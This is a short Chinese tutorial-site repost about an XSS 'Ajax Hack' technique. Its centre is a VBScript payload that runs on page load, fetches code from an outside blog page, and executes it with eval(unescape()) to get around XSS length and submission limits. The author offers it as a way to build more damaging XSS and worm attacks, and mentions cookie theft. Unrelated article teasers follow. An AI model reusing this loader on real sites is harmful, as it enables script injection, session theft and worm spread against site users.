一个有趣的Ajax Hack示范

2016-02-19 13:00 2 1 收藏

清醒时做事,糊涂时读书,大怒时睡觉,无聊时关注图老师为大家准备的精彩内容。下面为大家推荐一个有趣的Ajax Hack示范,无聊中的都看过来。

【 tulaoshi.com - Web开发 】

今天在梦之光芒的BLOG上看见了一个Ajax Hack示范,其实跨站发现很容易,但是要做到大危害还是很难,偷偷COOKIE什么的只针对用户而已,XSS WORM的那种利用才是可怕的。

来看看他的一段VBSCRIPT脚本

代码如下:
vbscript:execute(" 
dim l,s: 
l=chr(13)+chr(10): 
s=""sub mycode""&l: 
s=s&""dim http,url,pg,p,p2,cd,ht,o""&l: 
s=s&""url=""""http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html""""""&l: 
s=s&""set http=createobject(""""Microsoft.XMLHTTP"""")""&l: 
s=s&""http.open """"get"""",url,false""&l: 
s=s&""http.send("""""""")""&l: 
s=s&""pg=http.responseText""&l: 
s=s&""p=instr(1,pg,""""ILOVEUNING-BEGIN"""")""&l: 
s=s&""if p=null or p1 then exit sub""&l: 
s=s&""p=instr(p,pg,chr(37))""&l: 
s=s&""if p=null or p1 then exit sub""&l: 
s=s&""p2=instr(p,pg,chr(60))""&l: 
s=s&""cd=mid(pg,p,p2-p)""&l: 
s=s&""ht=""""eval(unescape('""""&cd&""""'))""""""&l: 
s=s&""window.execScript ht,""""jscript""""""&l: 
s=s&""end sub""&l: 
execute(s): 
document.body.onload=getref(""mycode""): 
") 
调用代码在 http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html
这样就实现了本站调用代码,换个思路,是否这就解决了Ajax Hack常用的的提交数据限制(站外提交没有权限,XSS代码长度限制)的问题,呵呵~这里我也没实验。

再还有一个思路就是剑心的分片写入脚本再eval出来~这两个思路结合起来,也许我们就能在苛刻的XSS漏洞上创造奇迹!

来源:https://www.tulaoshi.com/n/20160219/1602760.html

延伸阅读
AJAX(Asynchronous JavaScript And XML)是一种运用JavaScript和可扩展标记语言(XML),在网络浏览器和服务器之间传送或接受数据的技术。主要应用于Ria(Rich internet applications)的开发上。 xml问题终于在今天还是解决了。最后在FireFox里还是使用了Dom的一些老方法。我这里就具体解释一下方法吧. 代码: var XmlHttp; //用来...
标签: PS PS基础
完整后的效果图 步骤1 在 Photoshop 中创建一个新文档,按下图设置: 步骤2 双击背景层点击OK解锁。现在,右击图层选择混合选项。在这里,我们将添加一个从浅灰色要深色的径向渐变: 步骤3 使用圆角矩形工具,设置半径为40像素,创建一个多边形。现阶段颜色并不重要,因为我们要在之后应用图层样式。 步骤4 右击该层...
《黑道圣徒2》一个有趣的小bug 在金字塔计划那关里,有一关是要炸掉实验室。 但之前要通往秘密通道(貌似是个下水道出水口)。 此时你的三王之一强尼.盖特(就是平头纹身戴眼镜的那个)应该跟在你的身后。 通过秘密通道后,在秘密通道的出口前,会发现有两个强尼盖特在你队伍里。 一个在出口外端着AK等你,一个则跟在你身后的秘密通道里停住...
你有没有遇到过这样的情景,我们曾试图改变别人反馈的乏味、过时的评价,可更新后的方案仍等不到对方说Yes?你反问他究竟什么才不土,可对方说不清具体标准。你只好悻悻地拿回去再修改一次又一次,直到你要抓狂了,却仍换不来客户的一个笑脸.. 如何让别人看到自己的设计会心一笑?本文仅抛砖引玉,就有趣的设计谈开来: 有趣,好像就是乏味...
标签: Web开发
如果要问做什么事是最有吸iPod之外) 它们都很cool, 而且都是很创新的项目。 抛开这些不管,Web设计者们对设计交互式的Web没有什么更好的办法,却对我们做桌面软件的同事投去少许羡慕的目光.桌面应用程序有丰富的界面以及对于Web程序来说无法比拟的响应能力。同样,Web的快速发展,在我们所提供的体验和用户从桌面应用程序所得到的体...

经验教程

121

收藏

76
微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部